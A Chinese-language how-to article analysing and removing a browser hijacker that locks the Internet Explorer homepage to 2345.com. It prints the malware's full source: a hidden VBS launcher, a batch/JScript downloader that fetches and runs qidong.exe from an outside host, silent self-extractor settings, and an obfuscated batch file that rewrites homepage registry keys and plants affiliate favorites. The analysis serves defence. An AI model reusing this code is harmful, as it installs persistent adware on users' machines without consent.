干掉臭名昭著的流氓2345.com篡改,行不?(1)

推荐指数: 点击:127   文字大小: 加入收藏夹

 主页给改成了臭名昭著的2345.com，开始没在意：改了就改了吧，我再改回来吧。

    当然，直接把主页改成about:blank肯定是没戏的，不过我也试了一下：万一好使呢？虽然结果不出所料的不好使。

    再看一眼360安全卫士的锁定主页——居然还是空白页！解开锁定再锁定上也没用，这不得不说是360失败的地方……

    不过这样也确定了，那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使，不过有了360，那就用360清理插件吧，我也懒得自己去找注册表……【附：注册表关于IE主页的键值：HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain中的StartPage，直接修改成想要的主页就可以】
    清理之后，不出所料有一个差评插件，清理之！之后按照提示重启
    可是重启之后发现：NANI?还是不好使？再次清理之！这次就不要重启了，这时发现：主页已经被改回到正常的空白页了，说明360的清理是有效的，可是为什么重启之后又回来了呢？这个时候就可以确定，这家伙在启动项里做了手脚。WIN（就是键盘上那个微软的标志，一按会拉开开始菜单的那个按键）+R，输入msconfig，查看启动项：
    发现他了！一个叫做kqidong.lnk的启动项，目标指向C:PROGR~1qidongqidong.vbs，这里就要解释一下：如果用过DOS（不是那个CMD批处理，就是DOS系统）的童鞋都会知道，当一个文件夹在电脑中的名字太长时，就会显示为“前几个字母+~+数字编号”的形式，这样目标就确定了：C:Program Filesqidongqidong.vbs这个时候其实问题就算是解决了，把这个文件夹C:Program Filesqidong删除肯定就没问题了，可是拥有求知欲的人永远是蛋疼的，我点了进去：
    因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹，所以我很轻松的看到了里面所包含的东西：kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat，其中qidong.exe是winrar 自解压格式，正好我也懒得反编译；我只扫了一眼就确定了：这个东东一定是国人弄得！（因为用的是汉语拼音……）

先查看那个qidong.vbs，用记事本看看他源码：右键——编辑，发现了里面的内容只有短短三行：

set Cleaner=createobject("wscript.shell")
Cleaner.run "qidong.bat",vbhide
Cleaner.run "xiazai.bat",vbhide

    这三行代码的意思仅仅是在隐藏窗体的情况下运行qidong.bat和xiazai.bat两个批处理文件，那再看看这两个的源码吧，先是xiazai.bat，同样右键——编辑：

echo=1/*>nul&@cls
@echo off
call :http "http://www.jinrong800.com/baiduguangjia/qidong/qidong.exe" "C:Program Files"qidongqidong.exe"
@echo
start "" "C:Program Files"qidongqidong.exe
:http
echo Source:      "%~1"
echo Destination: "%~f2"
echo Start downloading. . .
cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
echo OK!
goto :eof
*/
var iLocal,iRemote,xPost,sGet;
iLocal =WScript.Arguments(1); 
iRemote = WScript.Arguments(0); 
iLocal=iLocal.toLowerCase();
iRemote=iRemote.toLowerCase();
xPost = new ActiveXObject("Microsoft"+String.fromCharCode(0x2e)+"XMLHTTP");
xPost.Open("GET",iRemote,0);
xPost.Send();
sGet = new ActiveXObject("ADODB"+String.fromCharCode(0x2e)+"Stream");
sGet.Mode = 3;
sGet.Type = 1; 
sGet.Open(); 
sGet.Write(xPost.responseBody);
sGet.SaveToFile(iLocal,2); 

    看不懂？没关系！联系那个文件名和几个网址和地址我们就可以断定：这是用来下载那个自解压文件并解压的，那我们去看看那个自解压文件qidong.exe：右键——用Winrar打开，里面仅仅有着一个qidong.bat，在右面提示着

;下面的注释包含自解压脚本命令

Silent=1
Overwrite=1

    这里我解释一下：Silent=1是静默状态下解压，不会弹出窗口，而Overwrite=1是如果有同名文件直接替换，保证了不会弹出：“XXX已经存在，是否覆盖”之类的提示来告诉你他在运行。
    那么接下来看看qidong.bat，同样“右键——编辑”，可这次就不那么顺利了：里面全是乱码，这怎么办呢？还好我有神器：Notepad++，右键——Edit with Notepad++（UE当然也可以做到同样的事情），这次他就无处躲藏了，请看源码：

%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a 
cls
::设置主页并锁定
@REG ADD "HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /ve /t REG_EXPAND_SZ /d "C:Program FilesInternet Exploreriexplore.exe http://www.2345.com/?10688" /f   
@reg add "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.2345.com/?10688" /f   

::添加快捷方式到收藏夹
@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k2345网址导航.url&echo URL="http://www.2345.com/?10688" >>%%k2345网址导航.url&del /f /s /q %Temp%Favorites.txt>nul
)

@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k什么电影都能搜索-你懂的.url&echo URL="http://www.ks888.net" >>%%k什么电影都能搜索-你懂的.url&del /f /s /q %Temp%Favorites.txt>nul
)

@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k1淘宝热卖.url&echo URL="http://www.taobao.com/go/chn/tbk_channel/channelcode.php?pid=mm_10836206_0_0&eventid=101329" >>%%k1淘宝热卖.url&del /f /s /q %Temp%Favorites.txt>nul
)

    居然连注释都有……这流氓软件的作者还真可爱，正好也省去了多费口舌解释，这样通过开机启动项里面运行的qidong.vbs，即使文件被360干掉了他也能保证每次开机都重新缠上你，果然是“臭牛氓”！
    而那个kqidong.zip中装的就是kqidong.lnk则是最开始启动项里面的那个，直接指向C:Program Filesqidongqidong.vbs
    至此我们已经完整的掌握了这个万恶的2345.com的流氓团伙的信息，可以直接干掉他了！
    通过随便一个清理插件的工具清理掉插件、之后打开msconfig，ban掉kqidong.lnk这个启动项，再把C盘Program Files下的qidong文件夹删除，这个臭牛氓就被彻底的请出电脑了！不过记得最后一步：把主页改回来，最好去上面给出了注册表项里面查看一下Startpage，是不是已经改过来了，如果没改过来就处理一下吧。

获得更多 -> 防毒技巧 -> 网络安全

责任编辑: webmaster >>> 百度上搜索  谷歌上搜索

点击复制本连接 （//www.hugesky.com/showarticle.php?id=6963）